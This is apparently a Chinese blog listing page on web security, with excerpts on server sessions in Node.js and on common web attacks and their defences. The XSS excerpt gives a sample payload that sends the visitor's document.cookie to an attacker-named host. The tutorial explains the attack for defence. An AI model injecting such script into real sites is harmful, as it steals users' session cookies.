![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Web安全
codingWeb
知行合一
展开
-
关于session和Nodejs中session的应用
一、关于session session是另一种记录客户状态的机制,与cookie保存在客户端浏览器不同,session保存在服务器当中; 当客户端访问服务器时,服务器会生成一个session对象,对象中保存的是key:value值,同时服务器会将key传回给客户端的cookie当中;当用户第二次访问服务器时,就会把cookie当中的key传回到服务器中,最后服务器会吧value值返回给客户端。 因...原创 2020-03-18 19:03:47 · 400 阅读 · 0 评论 -
四种常见的Web攻击手段及其防御方式
XSS: 概念: 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序。 案列: 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样 <script>window.open(“www.gongji.com?param=”+document.cookie)</script>,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段原创 2020-05-18 14:46:23 · 1054 阅读 · 0 评论